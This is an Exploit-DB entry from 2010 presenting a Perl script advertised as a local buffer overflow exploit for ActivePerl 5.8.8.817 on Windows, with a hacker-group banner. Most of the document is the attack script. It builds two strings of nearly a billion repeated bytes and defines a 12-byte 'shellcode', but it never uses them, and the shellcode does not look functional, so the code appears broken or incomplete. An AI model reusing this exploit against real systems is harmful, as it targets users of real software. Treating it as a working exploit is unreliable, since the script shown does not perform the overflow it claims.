ActivePerl 5.8.8.817 - Buffer Overflow

2010-06-09T00:00:00
ID EDB-ID:13806
Type exploitdb
Reporter PoisonCode
Modified 2010-06-09T00:00:00

Description

Buffer Overflow ActivePerl v5.8.8.817. Local exploit for windows platform

                                        
                                            # Software Link:http://www.activestate.com
# Version: v5.8.8.817
# Platform:Windows

_____    _____                      _ _         
|  __ \ / ____|                    (_) |        
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _ 
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


Exploit
-------------------------------------------
#!/usr/bin/perl
# File Name :Local Buffer Overflow ActivePerl
# Author :PoisonCode
# Exploit Title: Local Buffer Overflow ActivePerl
# Date:09/06/2010
# Author:PoisonCode
# Site  :http://www.activestate.com
# Version: 5.8.8.817
# Tested on: Windows
$file="Exploit Perl Version 5.8.8.817";
print " ============================================\n";
print " =     Local Buffer Overflow ActivePerl      =\n";
print " =        Version: 5.8.8.817                 =\n";
print " =            Autor:PoisonCode               =\n";
print " =    Web :PanamaSecurity.blogspot.com       =\n";
print " =============================================\n";
print "\n";
print " Espere Mientras Trabaja el Exploit\n";
my $fruty="\x87" x 999999999;
my $loops="\x67" x 999999999;
my $shellcode="\x00\x13\xFF\xC4\x00\x10\x0a\xe4\x00\x08\x5b\x5d";